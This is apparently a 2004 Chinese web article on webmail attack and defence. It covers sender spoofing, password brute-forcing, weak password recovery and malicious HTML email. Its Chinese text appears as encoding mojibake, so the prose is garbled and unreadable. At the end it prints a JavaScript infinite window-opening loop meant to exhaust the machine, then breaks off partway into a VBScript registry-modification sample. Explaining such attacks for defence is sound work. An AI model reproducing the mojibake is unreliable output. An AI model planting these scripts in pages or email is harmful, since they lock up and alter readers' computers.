Ê×Ò³ | Óʼþ×ÊѶ | ¼¼Êõ½Ì³Ì | ½â¾ö·½°¸ | ²úÆ·ÆÀ²â | ÓʼþÈ˲Š| Óʼþ²©¿Í | ÓʼþϵͳÂÛ̳ | Èí¼þÏÂÔØ | ÓʼþÖÜ¿¯ | ÈȵãרÌâ | ¹¤¾ß
ÍøÂç¼¼Êõ | ²Ù×÷ϵͳ | Óʼþϵͳ | ¿Í»§¶Ë | µç×ÓÓÊÏä | ·´À¬»øÓʼþ | Óʼþ°²È« | ÓʼþÓªÏú | ÒÆ¶¯µçÓÊ | ÓʼþÈí¼þÏÂÔØ | µç×ÓÊéÏÂÔØ

ÓʼþÍøÂ簲ȫ

ϵͳ°²È« | ÓʼþÈí¼þ©¶´ | °²È«»ù´¡ | Êý×ÖÇ©Ãû | ¹¥·À¼¼Êõ | ²¡¶¾¹«¸æ | ²¡¶¾²éɱ | ISA Server | ·À»ðǽ |
Ê×Ò³ > ÓʼþÍøÂ簲ȫ > Óʼþ°²È«ÓëÊý×ÖÇ©Ãû > Webmail¹¥·Àʵս > ÕýÎÄ

Webmail¹¥·Àʵս

³ö´¦£ºwww.5dmail.net ×÷ÕߣºÇë×÷ÕßÁªÏµ ʱ¼ä£º2004-6-9 11:15:00
WebmailÊÇÖ¸ÀûÓÃä¯ÀÀÆ÷ͨ¹ýweb·½Ê½À´ÊÕ·¢µç×ÓÓʼþµÄ·þÎñ»ò¼¼Êõ£¬²»Ðè½èÖúÓʼþ¿Í»§¶Ë£¬¿ÉÒÔ˵ֻҪÄÜÉÏÍø¾ÍÄÜʹÓÃwebmail£¬¼«´óµØ·½±ãÁËÓû§¶ÔÓʼþµÄÊÕ·¢¡£¶ÔÓÚ²»ÄÜÊìÁ·Ê¹ÓÃÓʼþ¿Í»§¶Ë£¬»òÕßÔÚÍø°É²»±ãʹÓÃÓʼþ¿Í»§¶ËµÄÓû§À´Ëµ£¬webmail¸üÊDZز»¿ÉÉÙµÄÑ¡Ôñ¡£EmailÄܹ»³ÉΪµ±½ñinternetÉÏÓ¦ÓÃ×î¹ã·ºµÄÍøÂç·þÎñ£¬webmail¿Éν¹¦²»¿Éû¡£

ÓÉÓÚÓû§µÄʹÓò»µ±»òÕßwebmailϵͳµÄ¿ª·¢²»ÖÜ£¬¶¼ÓпÉÄܸøwebmailµÄʹÓôøÀ´¸ü¶àµÄ°²È«Íþв¡£Í¬Ñù£¬webmailϵͳ×÷Ϊµ±½ñµç×ÓÓʼþϵͳµÄÖØÒª×é³É²¿·Ý£¬ËüµÄ°²È«ÐÔÒ²ÊDz»¿ÉºöÊӵġ£ 

Ò»¡¢ÓʼþµØÖ·ÆÛÆ­
ÓʼþµØÖ·ÆÛÆ­ÊǷdz£¼òµ¥ºÍÈÝÒ׵쬹¥»÷ÕßÕë¶ÔÓû§µÄµç×ÓÓʼþµØÖ·£¬È¡Ò»¸öÏàËÆµÄµç×ÓÓʼþÃû£¬ÔÚwebmailµÄÓÊÏäÅäÖÃÖн«¡°·¢¼þÈËÐÕÃû¡±ÅäÖóÉÓëÓû§Ò»ÑùµÄ·¢¼þÈËÐÕÃû£¨ÓÐЩwebmailϵͳûÓÐÌṩ´Ë¹¦ÄÜ£©£¬È»ºóð³ä¸ÃÓû§·¢Ë͵ç×ÓÓʼþ£¬ÔÚËûÈËÊÕµ½Óʼþʱ£¬ÍùÍù²»»á´ÓÓʼþµØÖ·¡¢ÓʼþÐÅϢͷµÈÉÏÃæ×ö×Ðϸ¼ì²é£¬´Ó·¢¼þÈËÐÕÃû¡¢ÓʼþÄÚÈݵÈÉÏÃæÓÖ¿´²»³öÒìÑù£¬ÎóÒÔÎªÕæ£¬¹¥»÷Õß´Ó¶ø´ïµ½ÆÛÆ­µÄÄ¿µÄ¡£ÀýÈçijÓû§µÄµç×ÓÓʼþÃûÊÇwolfe£¬¹¥»÷Õ߾ͻáÈ¡w0lfe¡¢wo1fe¡¢wolfee¡¢woolfeÖ®ÀàÏàËÆµÄµç×ÓÓʼþÃûÀ´½øÐÐÆÛÆ­¡£ËäÈ»Ãâ·ÑµÄÎç²ÍÔ½À´Ô½Äѳԣ¬µ«»¹ÊÇÓкܶàÓû§Ê¹ÓõÄÊÇÃâ·Ñµç×ÓÓÊÏ䣬ͨ¹ý×¢²áÉêÇ룬¹¥»÷ÕߺÜÈÝÒ׵õ½ÏàËÆµÄµç×ÓÓʼþµØÖ·¡£ 

ÈËÃÇͨ³£ÒÔΪµç×ÓÓʼþµÄ»Ø¸´µØÖ·¾ÍÊÇËüµÄ·¢¼þÈ˵ØÖ·£¬Æäʵ²»È»£¬ÔÚRFC 822ÖÐÃ÷È·¶¨ÒåÁË·¢¼þÈ˵ØÖ·ºÍ»Ø¸´µØÖ·¿ÉÒÔ²»Ò»Ñù£¬ÊìϤµç×ÓÓʼþ¿Í»§¶ËʹÓõÄÓû§Ò²»áÃ÷°×ÕâÒ»µã£¬ÔÚÅäÖÃÕÊ»§ÊôÐÔ»ò׫дÓʼþʱ£¬¿ÉÒÔÖ¸¶¨Óë·¢¼þÈ˵ØÖ·²»Í¬µÄ»Ø¸´µØÖ·¡£ÓÉÓÚÓû§ÔÚÊÕµ½Ä³¸öÓʼþʱ£¬ËäÈ»»á¼ì²é·¢¼þÈ˵ØÖ·ÊÇ·ñÕæÊµ£¬µ«Ôڻظ´Ê±£¬²¢²»»á¶Ô»Ø¸´µØÖ·×ö³ö×ÐϸµÄ¼ì²é£¬ËùÒÔ£¬Èç¹ûÅäºÏsmtpÆÛƭʹÓ㬷¢¼þÈ˵ØÖ·ÊÇÒª¹¥»÷µÄÓû§µÄµç×ÓÓʼþµØÖ·£¬»Ø¸´µØÖ·ÔòÊǹ¥»÷Õß×ÔÒѵĵç×ÓÓʼþµØÖ·£¬ÄÇôÕâÑù¾Í»á¾ßÓиü´óµÄÆÛÆ­ÐÔ£¬ÓÕÆ­ËûÈ˽«Óʼþ·¢Ë͵½¹¥»÷Õߵĵç×ÓÓÊÏäÖС£

Ëùνº¦ÈËÖ®ÐIJ»¿ÉÓУ¬·ÀÈËÖ®ÐIJ»¿ÉÎÞ£¬¼øÓÚÓʼþµØÖ·ÆÛÆ­µÄÒ×ÓÚʵÏÖºÍΣÏÕÐÔ£¬ÎÒÃDz»µÃ²»Ê±Ê±Ìá·À£¬ÒÔÃâÉϵ±ÊÜÆ­¡£¶ÔÓÚwebmailϵͳ¶øÑÔ£¬ÌṩÓʼþÐÅϢͷÄÚÈݼì²é¡¢smtpÈÏÖ¤£¨Èç¹û¸ÃÓʼþϵͳ֧³ÖsmtpµÄ»°£©µÈ·þÎñ¼¼Êõ£¬½«ÓʼþµØÖ·ÆÛÆ­´øÀ´µÄΣº¦½µÖÁ×îСÊǷdz£ÓбØÒªµÄ¡£¶ÔÓʼþÓû§¶øÑÔ£¬ÈÏÕæ¼ì²éÓʼþµÄ·¢¼þÈËÓʼþµØÖ·¡¢·¢¼þÈËIPµØÖ·¡¢»Ø¸´µØÖ·µÈÓʼþÐÅϢͷÄÚÈÝÊǺÜÖØÒªµÄ¡£

¶þ¡¢Webmail±©Á¦ÆÆ½â
InternetÉϿͻ§¶ËÓë·þÎñ¶ËµÄ½»»¥£¬»ù±¾É϶¼ÊÇͨ¹ýÔÚ¿Í»§¶ËÒÔÌá½»±íµ¥µÄÐÎʽ½»ÓÉ·þÎñ¶Ë³ÌÐò£¨ÈçCGI¡¢ASPµÈ£©´¦ÀíÀ´ÊµÏֵģ¬webmailµÄÃÜÂëÑéÖ¤¼´Èç´Ë£¬Óû§ÔÚä¯ÀÀÆ÷µÄ±íµ¥ÔªËØÀïÊäÈëÕÊ»§Ãû¡¢ÃÜÂëµÈÐÅÏ¢²¢Ìá½»ÒԺ󣬷þÎñ¶Ë¶ÔÆä½øÐÐÑéÖ¤£¬Èç¹ûÕýÈ·µÄ»°£¬Ôò»¶Ó­Óû§½øÈë×Ô¼ºµÄwebmailÒ³Ãæ£¬·ñÔò£¬·µ»ØÒ»¸ö³ö´íÒ³Ãæ¸ø¿Í»§¶Ë¡£

¼®´Ë£¬¹¥»÷Õß½èÖúһЩºÚ¿Í¹¤¾ß£¬²»¶ÏµÄÓò»Í¬µÄÃÜÂë³¢ÊԵǼ£¬Í¨¹ý±È½Ï·µ»ØÒ³ÃæµÄÒìͬ£¬´Ó¶øÅжϳöÓÊÏäÃÜÂëÊÇ·ñÆÆ½â³É¹¦¡£°ïÖú¹¥»÷ÕßÍê³É´ËÀ౩Á¦ÆÆ½âµÄ¹¤¾ßÓв»ÉÙ£¬Èçwwwhack¡¢Ð¡éŵÄËÝÑ©µÈ£¬ÓÈÒÔËÝÑ©µÄ¹¦ÄÜ×îΪǿ´ó£¬Ëü±¾ÉíÒѾ­ÊÇÒ»¸ö¹¦ÄÜÍêÉÆµÄä¯ÀÀÆ÷£¬Í¨¹ý·ÖÎöºÍÌáÈ¡Ò³ÃæÖÐµÄ±íµ¥£¬¸øÏàÓ¦µÄ±íµ¥ÔªËعÒÉÏ×ÖµäÎļþ£¬ÔÙ¸ù¾Ý±íµ¥Ìá½»ºó·µ»ØµÄ´íÎó±êÖ¾ÅÐ¶ÏÆÆ½âÊÇ·ñ³É¹¦¡£

µ±È»ÎÒÃÇÒ²¿´µ½£¬ËÝѩ֮ÀàµÄweb̽²âÆ÷£¬¿ÉÒÔ̽²âµ½µÄ²»½öÊÇwebmailµÄÃÜÂ룬ÏñÂÛ̳¡¢ÁÄÌìÊÒÖ®ÀàËùÓÐͨ¹ý±íµ¥½øÐÐÑéÖ¤µÇ¼µÄÕÊ»§ÃÜÂë¶¼ÊÇ¿ÉÒÔ̽²âµ½µÄ¡£

¶ÔÓÚwebmailµÄ±©Á¦ÆÆ½â£¬Ðí¶àwebmailϵͳ¶¼²ÉÈ¡ÁËÏàÓ¦µÄ·À·¶´ëÊ©¡£Èç¹ûijÕÊ»§Ôڽ϶̵Äʱ¼äÄÚÓжà´Î´íÎóµÇ¼£¬¼´ÈÏΪ¸ÃÕÊ»§Êܵ½Á˱©Á¦ÆÆ½â£¬·À·¶´ëʩһ°ãÓÐÈçÏÂÈýÖÖ£º

1¡¢ ½ûÓÃÕÊ»§£º°ÑÊܵ½±©Á¦ÆÆ½âµÄÕÊ»§½ûÖ¹Ò»¶Îʱ¼äµÇ¼£¬Ò»°ãÊÇ5ÖÁ10·ÖÖÓ£¬µ«ÊÇ£¬Èç¹û¹¥»÷Õß×ÜÊdz¢ÊÔ±©Á¦ÆÆ½â£¬Ôò¸ÃÕÊ»§¾ÍÒ»Ö±´¦ÓÚ½ûÓÃ״̬²»ÄܵǼ£¬µ¼ÖÂÕæÕýµÄÓû§²»ÄÜ·ÃÎÊ×Ô¼ºµÄÓÊÏ䣬´Ó¶øÐγÉDOS¹¥»÷¡£

2¡¢ ½ûÖ¹IPµØÖ·£º°Ñ½øÐб©Á¦ÆÆ½âµÄIPµØÖ·½ûÖ¹Ò»¶Îʱ¼ä²»ÄÜʹÓÃwebmail¡£ÕâËäÈ»ÔÚÒ»¶¨³Ì¶ÈÉϽâ¾öÁË¡°½ûÓÃÕÊ»§¡±´øÀ´µÄÎÊÌ⣬µ«¸ü´óµÄÎÊÌâÊÇ£¬ÕâÊÆ±Øµ¼ÖÂÔÚÍø°É¡¢¹«Ë¾¡¢Ñ§Ð£ÉõÖÁһЩ³ÇÓòÍøÄÚ¹²ÓÃͬһIPµØÖ··ÃÎÊinternetµÄÓû§²»ÄÜʹÓøÃwebmail¡£Èç¹û¹¥»÷Õß²ÉÓöà¸ö´úÀíµØÖ·ÂÖÑ­¹¥»÷£¬ÉõÖÁ²ÉÓ÷ֲ¼Ê½µÄÆÆ½â¹¥»÷£¬ÄÇô¡°½ûÖ¹IPµØÖ·¡±¾ÍÄÑÒÔ·À·¶ÁË¡£

3¡¢ µÇ¼¼ìÑ飺ÕâÖÖ·À·¶´ëʩһ°ãÓëÉÏÃæÁ½ÖÖ·À·¶´ëÊ©½áºÏÆðÀ´Ê¹Óã¬ÔÚ½ûÖ¹²»ÄܵǼµÄͬʱ£¬·µ»Ø¸ø¿Í»§¶ËµÄÒ³ÃæÖаüº¬Ò»¸öËæ»ú²úÉúµÄ¼ìÑé×Ö·û´®£¬Ö»ÓÐÓû§ÔÚÏàÓ¦µÄÊäÈë¿òÀïÕýÈ·ÊäÈëÁ˸Ã×Ö·û´®²ÅÄܽøÐеǼ£¬ÕâÑù¾ÍÄÜÓÐЧ±ÜÃâÉÏÃæÁ½ÖÖ·À·¶´ëÊ©´øÀ´µÄ¸ºÃæÓ°Ïì¡£²»¹ý£¬¹¥»÷ÕßÒÀÈ»ÓпɳËÖ®»ú£¬Í¨¹ý¿ª·¢³öÏàÓ¦µÄ¹¤¾ßÌáÈ¡·µ»ØÒ³ÃæÖеļìÑé×Ö·û´®£¬ÔÙ½«´Ë¼ìÑé×Ö·û´®×öΪ±íµ¥ÔªËØÖµÌá½»£¬ÄÇôÓÖ¿ÉÒÔÐγÉÓÐЧµÄwebmail±©Á¦ÆÆ½âÁË¡£Èç¹û¼ìÑé×Ö·û´®Êǰüº¬ÔÚͼƬÖУ¬¶øÍ¼Æ¬µÄÎļþÃûÓÖËæ»ú²úÉú£¬ÄÇô¹¥»÷Õ߾ͺÜÄÑ¿ª·¢³öÏàÓ¦µÄ¹¤¾ß½øÐб©Á¦ÆÆ½â£¬ÔÚÕâÒ»µãÉÏ£¬yahooµçÓʾÍÊÇÒ»¸ö·Ç³£³öÉ«µÄÀý×Ó¡£

ËäÈ»webmailµÄ±©Á¦ÆÆ½âÓÐÖî¶àµÄ·À·¶´ëÊ©£¬µ«Ëü»¹ÊǺÜÄѱ»ÍêÈ«±ÜÃ⣬Èç¹ûwebmailϵͳ°ÑÒ»·ÖÖÓÄÚÎå´Î´íÎóµÄµÇ¼µ±³ÉÊDZ©Á¦ÆÆ½â£¬ÄÇô¹¥»÷Õ߾ͻáÔÚÒ»·ÖÖÓÄÚÖ»½øÐÐËĴεǼ³¢ÊÔ¡£ËùÒÔ£¬·À·¶webmail±©Á¦ÆÆ½â»¹Ö÷Òª¿¿Óû§×Ô¼º²ÉÈ¡Á¼ºÃµÄÃÜÂë²ßÂÔ£¬ÈçÃÜÂë×ã¹»¸´ÔÓ¡¢²»ÓëÆäËûÃÜÂëÏàͬ¡¢ÃÜÂ붨ÆÚ¸ü¸ÄµÈ£¬ÕâÑù£¬¹¥»÷ÕߺÜÄѱ©Á¦ÆÆ½â³É¹¦¡£

Èý¡¢ÓÊÏäÃÜÂë»Ö¸´
ÄÑÃâ»áÓÐÓû§ÒÅʧÓÊÏäÃÜÂëµÄÇé¿ö£¬ÎªÁËÈÃÓû§ÄÜÕÒ»ØÃÜÂë¼ÌÐøÊ¹ÓÃ×Ô¼ºµÄÓÊÏ䣬´ó¶àÊýwebmailϵͳ¶¼»áÏòÓû§ÌṩÓÊÏäÃÜÂë»Ö¸´»úÖÆ£¬ÈÃÓû§»Ø´ðһϵÁÐÎÊÌ⣬Èç¹û´ð°¸¶¼ÕýÈ·µÄ»°£¬¾Í»áÈÃÓû§»Ö¸´×Ô¼ºÓÊÏäµÄÃÜÂë¡£µ«ÊÇ£¬Èç¹ûÃÜÂë»Ö¸´»úÖÆ²»¹»ºÏÀíºÍ°²È«£¬¾Í»á¸ø¹¥»÷Õß¼ÓÒÔÀûÓã¬ÇáËÉ»ñÈ¡ËûÈËÓÊÏäÃÜÂë¡£

ÏÂÃæÊÇÐí¶àwebmailϵͳÃÜÂë»Ö¸´»úÖÆËù²ÉÈ¡µÄÃÜÂë»Ö¸´²½Ö裬ֻÓÐÓû§¶Ôÿ²½Ìá³öµÄÎÊÌâ»Ø´ðÕýÈ·µÄ»°²Å»á½øÈëÏÂÒ»²½£¬·ñÔò·µ»Ø³ö´íÒ³Ãæ£¬Õë¶Ôÿһ²½£¬¹¥»÷Õß¶¼ÓпɳËÖ®»ú£º

µÚÒ»²½£ºÊäÈëÕÊ»§£ºÔÚ½øÈëÃÜÂë»Ö¸´Ò³ÃæºóÊ×ÏÈÌáʾÓû§ÊäÈëÒª»Ö¸´ÃÜÂëµÄÓÊÏäÕÊ»§¡£ÕâÒ»²½¶Ô¹¥»÷Õß¶øÑÔ×ÔÈ»²»³ÉÎÊÌ⣬ÓÊÏäÕÊ»§¾ÍÊÇËûÒª¹¥»÷µÄÄ¿±ê¡£

µÚ¶þ²½£ºÊäÈëÉúÈÕ£ºÌáʾÓû§°´ÄêÔÂÈÕÊäÈë×Ô¼ºµÄÉúÈÕ¡£ÕâÒ»²½¶Ô¹¥»÷Õß¶øÑÔÒ²ºÜÇáËÉ£¬ÄêÔÂÈÕµÄÅÅÁÐ×éºÏºÜС£¬½èÖúËÝÑ©µÈ¹¤¾ßºÜ¿ì¾ÍÄÜÇî¾ÙÆÆ½â³öÀ´£¬ËùÒÔwebmailϵͳÓбØÒªÔڴ˲ÉÈ¡±©Á¦ÆÆ½â·À·¶´ëÊ©¡£²¢ÇÒÿ¸öÓû§ÐèҪעÒâµÄÊÇ£¬¹¥»÷Õß²»Ò»¶¨À´×ÔµØÇòµÄÁíÒ»¶Ë£¬ºÜ¿ÉÄܾÍÊÇÄãÉí±ßµÄÈË£¬»òÐíÕâЩÈ˸üÏëÖªµÀÄãÓÊÏäÀïÓÐÊ²Ã´ÃØÃÜ£¬¶øËûÃÇҪŪÇåÄãµÄÉúÈÕÍùÍùÊǼþÇá¶øÒ×¾ÙµÄÊÂÇ飬Äã²»ÊÇ×òÌì²Å¹ýÁËÉúÈÕpartyÂð£¿Äã²»ÊǸոհÑÉí·ÝÖ¤¸´Ó¡¼þ½»¸øÈËʲ¿Âð£¿ËùÒÔ£¬ÎªÁËÓÊÏ䰲ȫ£¬Óû§ÊDz»ÊÇÒª°ÑÕæÊµµÄÉúÈÕ×öΪÓÊÏä×¢²áÐÅÏ¢£¬webmailϵͳÊDz»ÊÇÒ»¶¨ÒªÓû§ÊäÈëÕæÊµµÄÉúÈÕ×öΪע²áÐÅÏ¢£¬Õ⻹Óдý¿¼ÂÇ¡£

µÚÈý²½£ºÎÊÌâ»Ø´ð£ºÌáʾÓû§»Ø´ð×Ô¼ºÉ趨µÄÎÊÌ⣬´ð°¸Ò²ÊÇÓû§×Ô¼ºÉ趨µÄ´ð°¸¡£ÔÚÕâÒ»²½£¬¹¥»÷ÕßÍùÍùÖ»Óп¿²Â²â£¬²»ÐÒµÄÊÇ£¬ºÜ¶àÓû§µÄÎÊÌâºÍ´ð°¸ÊÇÈç´ËµÄ¼òµ¥£¬ÒÔÖÂÓÚ¹¥»÷ÕßÄÜÇáÒ׵IJ²â³öÀ´£¬ÀýÈçÌá³öµÄÎÊÌâÖ»ÊÇ֪ʶÐÔµÄÎÊÌâ¡¢Ìá³öµÄÎÊÌâºÍ´ð°¸ÏàͬµÈ¡£¹¥»÷Õß¶ÔÓû§Ô½ÊìϤ£¬³É¹¦µÄ¿ÉÄÜÐÔ¾ÍÔ½´ó£¬ÀýÈçÓÐÓû§ÎÊ¡°ÄãÄÐÅóÓÑÊÇÄÄÀïÈË¡±£¬Êâ²»Öª£¬¹¥»÷ÕßÕýÊÇËýµÄÄÐÅóÓÑ¡£ËùÒÔ£¬Óû§°ÑÎÊÌâÉèÖóÉΨÓÐ×Ô¼ºÖªµÀµÄ´ð°¸ÖÁ¹ØÖØÒª£¬ÕâÑù¹¥»÷Õ߲źÜÄѵóѣ¬²»¹ý²»ÒªÍüÁ˴𰸣¬·ñÔò¾ÍµÃ²»³¥Ê§ÁË¡£

ÔÚÓû§ÕýÈ·Íê³ÉÒÔÉϸ÷²½ÖèÒÔºó£¬webmailϵͳ¾Í»áÈÃÓû§»Ö¸´×Ô¼ºÓÊÏäÕÊ»§µÄÃÜÂë¡£ÃÜÂë»Ö¸´µÄ·½Ê½ÓÖ¸÷Óв»Í¬£¬Ò»°ãÓÐÈçϼ¸ÖÖ·½Ê½£¬°²È«³Ì¶È¸÷Óв»Í¬£º

1¡¢ Ò³Ãæ·µ»Ø£º·µ»ØµÄÒ³ÃæÀïÏÔʾÓû§µÄÓÊÏäÃÜÂë¡£ÕâÑù¹ÊÈ»·½±ãʡʣ¬µ«ÊÇÈç¹ûÈù¥»÷Õߵõ½ÃÜÂ룬ÔòÄÜÔÚË¿ºÁ²»¾ª¶¯Óû§µÄÇé¿öÏÂʹÓÃÓû§µÄÓÊÏ䣬ʹµÃ¹¥»÷ÕßÄܳ¤ÆÚ¼àÊÓÓû§µÄÓÊÏäʹÓÃÇé¿ö£¬¸øÓû§´øÀ´¸ü´óµÄ°²È«Òþ»¼¡£

2¡¢ Óʼþ·¢ËÍ£º½«ÃÜÂë·¢Ë͵½Óû§×¢²áʱµÇ¼ÇµÄÁíÒ»¸öÓÊÏäÀï¡£¶ÔÓÚ¹¥»÷ÕßÀ´Ëµ£¬Ã¦Á˰ëÌ죬ÈÔÈ»ÊÇÒ»ÎÞËù»ñ£¬³ý·Ç¼ÌÐøÈ¥¹¥»÷ÁíÒ»¸öÓÊÏ䣻¶ÔÓÚÓû§À´Ëµ£¬ÔÚÁíÒ»¸öÓÊÏäÀïÊÕµ½·¢À´µÄÃÜÂëÔòÊÇÒ»¸ö¾¯¸æ£¬ËµÃ÷Óй¥»÷Õ߲²⵽ÁËËûµÄÓÊÏäÃÜÂëÌáʾÎÊÌ⣬ÆÈʹÓû§¾¡¿ì¸Ä±ä×Ô¼ºµÄÃÜÂëÌáʾÎÊÌâ¡£

²»¹ý£¬Èç¹ûÓû§×¢²áʱµÇ¼ÇµÄ²»ÊÇÒ»¸öÕýÈ·µÄÓÊÏ䣬»òÕ߸ÃÓÊÏäÒѾ­Ê§Ð§£¬ÄÇô£¬ÕâÑù²»½öÊǹ¥»÷Õߣ¬¾ÍÊÇÓû§±¾ÈËÒ²ÓÀÔ¶µÃ²»µ½ÃÜÂëÁË¡£ÓÐЩwebmailϵͳÔÚ×¢²áʱҪÇóÓû§µÇ¼ÇÕýÈ·µÄÓʼþµØÖ·£¬²¢°ÑÓÊÏ俪ͨµÄÑéÖ¤ÐÅÏ¢·¢Íù¸ÃÓʼþµØÖ·£¬²»¹ýÕâÑùÈÔÈ»²»ÄܱÜÃâÓû§ÔÚÓÊÏäʧЧºó²»Äָܻ´×Ô¼ºÓÊÏäÃÜÂëµÄÇé¿ö·¢Éú¡£

3¡¢ ÃÜÂëÖØÉ裺ÈÃÓû§ÖØÐÂÉèÖÃÒ»¸öÃÜÂë¡£ÕâÖÖ·½Ê½Ïà±È¡°Ò³Ãæ·µ»Ø¡±·½Ê½£¬ÔÚ¹¥»÷ÕßÖØÉèÃÜÂëºó£¬Óû§ÒòΪ²»ÄÜÕý³£µÇ¼½ø×Ô¼ºµÄÓÊÏä¶øÄܲì¾õ³öÊܵ½¹¥»÷£¬°²È«ÐÔÏà¶ÔºÃһЩ£»µ«ÊÇÏà±È¡°Óʼþ·¢ËÍ¡±·½Ê½£¬ÒòΪ¹¥»÷ÕßÄÜÁ¢¼´ÐÞ¸ÄÓÊÏäÃÜÂ룬ÉÙÁËÒ»²ã±£ÕÏ£¬°²È«ÐÔÓÖ²îһЩ¡£

ÓÉ¡°Ò³Ãæ·µ»Ø¡±»ò¡°Óʼþ·¢ËÍ¡±»ØÀ´µÄÃÜÂë¿ÉÒÔÃ÷ÏÔ¿´³ö£¬¸Ãµç×ÓÓʼþϵͳÊǰÑÓÊÏäÕÊ»§µÄÃÜÂëδ¾­¼ÓÃÜÖ±½ÓÒÔÃ÷Îı£´æÔÚÊý¾Ý¿â»òLDAP·þÎñÆ÷ÖС£ÕâÑù¾ÍÔì³ÉºÜ´óµÄ°²È«Òþ»¼£¬webmailϵͳ¹ÜÀíÔ±»òÇÖÈëÊý¾Ý¿âµÄ¹¥»÷ÕßÄÜÇáÒ×»ñÈ¡Óû§µÄÓÊÏäÃÜÂ룬Óû§È´ÍêÈ«²»ÖªÇ飬ËùÒÔΪÁ˼Ӵó±£ÃÜÐÔ£¬ÓбØÒª½«ÓÊÏäÃÜÂë¼ÓÃܺóÔÙÒÔÃÜÎÄ´æÈëÊý¾Ý¿â£¬×îºÃÓò»¿ÉÄæµÄµ¥Ïò¼ÓÃÜËã·¨£¬Èçmd5µÈ¡£

ÓÊÏäÃÜÂë»Ö¸´»úÖÆÊÇ·ñ°²È«£¬Ö÷Òª»¹ÊÇ¿´webmailϵͳÌá³öʲôÑùµÄÎÊÌâ¡¢²ÉȡʲôÑùµÄÎÊ´ð·½Ê½£¬ÀýÈ罫¶à¸öÃÜÂë»Ö¸´²½ÖèÖÐÌá³öµÄÎÊÌâ·ÅÔÚÒ»²½ÖÐÒ»ÆðÌá³ö£¬¾Í»áÏàÓ¦µØÔö¼Ó¹¥»÷ÕßµÄÄѶȴӶøÌá¸ß°²È«ÐÔ£¬ÏñËѺüÓʼþ¡¢ÐÂÀËÓʼþºÍyahooµçÓʵȶ¼ÊÇһЩÁîÈËʧÍûµÄÀý×Ó¡£

ËÄ¡¢¶ñÐÔHTMLÓʼþ
µç×ÓÓʼþÓÐÁ½ÖÖ¸ñʽ£º´¿Îı¾£¨txt£©ºÍ³¬Îı¾£¨html£©¡£HtmlÓʼþÓÉhtmlÓïÑÔд³É£¬µ±Í¨¹ýÖ§³ÖhtmlµÄÓʼþ¿Í»§¶Ë»òÒÔä¯ÀÀÆ÷µÇ¼½øÈëwebmail²é¿´Ê±£¬ÓÐ×ÖÌå¡¢ÑÕÉ«¡¢Á´½Ó¡¢Í¼Ïñ¡¢ÉùÒôµÈµÈ£¬¸øÈËÒÔÉî¿ÌµÄÓ¡Ïó£¬Ðí¶àÀ¬»ø¹ã¸æ¾ÍÊÇÒÔhtmlÓʼþ¸ñʽ·¢Ë͵ġ£

ÀûÓÃhtmlÓʼþ£¬¹¥»÷ÕßÄܽøÐеç×ÓÓʼþÆÛÆ­£¬ÉõÖÁÆÛÆ­Óû§¸ü¸Ä×Ô¼ºµÄÓÊÏäÃÜÂë¡£ÀýÈç¹¥»÷Õßͨ¹ý·ÖÎöwebmailÃÜÂëÐÞ¸ÄÒ³ÃæµÄ¸÷±íµ¥ÔªËØ£¬Éè¼ÆÒ»¸öÒþº¬ÓÐͬÑù±íµ¥µÄhtmlÒ³Ãæ£¬Ô¤Ïȸø¡°ÐÂÃÜÂ롱±íµ¥ÔªËظ³Öµ£¬È»ºóÒÔhtmlÓʼþ·¢Ë͸øÓû§£¬ÆÛÆ­Óû§ËµÔÚÒ³ÃæÖÐÌύij¸ö±íµ¥»òµã»÷ij¸öÁ´½Ó¾ÍÄÜ´ò¿ªÒ»¸ö¾«²ÊÍøÒ³£¬Óû§ÕÕ×öºó£¬ÔÚ´ò¿ª¡°¾«²ÊÍøÒ³¡±µÄͬʱ£¬Ò»¸öÐÞ¸ÄÓÊÏäÃÜÂëµÄ±íµ¥ÇëÇóÒѾ­·¢Ïòwebmailϵͳ£¬¶øÕâÒ»ÇУ¬Óû§ÍêÈ«²»ÖªÇ飬ֱµ½Ï´β»ÄܵǼ½ø×Ô¼ºÓÊÏäµÄʱºò¡£

ΪÁË·ÀÖ¹´ËÀàµÄhtmlÓʼþÆÛÆ­£¬ÔÚÐÞ¸ÄÓÊÏäÅäÖÃʱ£¬ÌرðÊÇÐÞ¸ÄÓÊÏäÃÜÂëºÍÌáʾÎÊÌâʱ£¬webmailϵͳÓбØÒªÈÃÓû§ÊäÈë¾ÉÃÜÂë¼ÓÒÔÈ·ÈÏ£¬ÕâÑùÒ²ÄÜÓÐЧ·ÀÖ¹ÔØÈ¡µ½µ±Ç°webmail»á»°µÄ¹¥»÷Õߣ¨ÏÂÃæ»á½éÉÜ£©¸ü¸ÄÓÊÏäÃÜÂë¡£

ͨ¹ýÔÚhtmlÓʼþÖÐǶÈë¶ñÐԽű¾³ÌÐò£¬¹¥»÷Õß»¹ÄܽøÐÐºÜ¶àÆÆ»µ¹¥»÷£¬ÈçÐÞ¸Ä×¢²á±í¡¢·Ç·¨²Ù×÷Îļþ¡¢¸ñʽ»¯Ó²ÅÌ¡¢ºÄ¾¡ÏµÍ³×ÊÔ´¡¢Ð޸ġ°¿ªÊ¼¡±²Ëµ¥µÈ£¬ÉõÖÁÄÜɾ³ýºÍ·¢ËÍÓû§µÄÓʼþ¡¢·ÃÎÊÓû§µÄµØÖ·²¾¡¢ÐÞ¸ÄÓÊÏäÕÊ»§ÃÜÂëµÈµÈ¡£¶ñÐԽű¾³ÌÐòÒ»°ãÓÉJavaScript»òVBScript½Å±¾ÓïÑÔд³É£¬ÄÚǶÔÚhtmlÓïÑÔÖУ¬Í¨¹ýµ÷ÓÃActiveX¿Ø¼þ»òÕß½áºÏWSHÀ´´ïµ½ÆÆ»µ¹¥»÷Ä¿µÄ¡£ÉîÊÜÐÞ¸Ää¯ÀÀÆ÷µÄ¶ñÐÔhtmlÒ³ÃæÖ®Í´£¬±¥¾­¡°»¶ÀÖʱ¹â¡±Óʼþ²¡¶¾Ö®¿àµÄÅóÓÑ£¬¶Ô´ËÓ¦¸Ã²»»áİÉú¡£ÏÂÃæÊÇÁ½¸ö¼òµ¥µÄ¶ñÐԽű¾³ÌÐò£º

Ò»¡¢´ò¿ªÎÞÊý¸öä¯ÀÀÆ÷´°¿Ú£¬Ö±ÖÁCPU³¬¸ººÉ£¬·Ç¹Ø»ú²»¿É£º

<script language="JavaScript">

<!--
while (true)
{
window.open("URI"); //Èç¹ûURI¾ÍÊǵ±Ç°Ò³±¾Éí£¬ÄǾ͸ü¾ßÆÆ»µÐÔ¡£

//-->

</script>

¶þ¡¢ÐÞ¸Ä×¢²á±í£º

<script language="VBScript">
Set RegWsh = CreateObject("WScript.Shell")
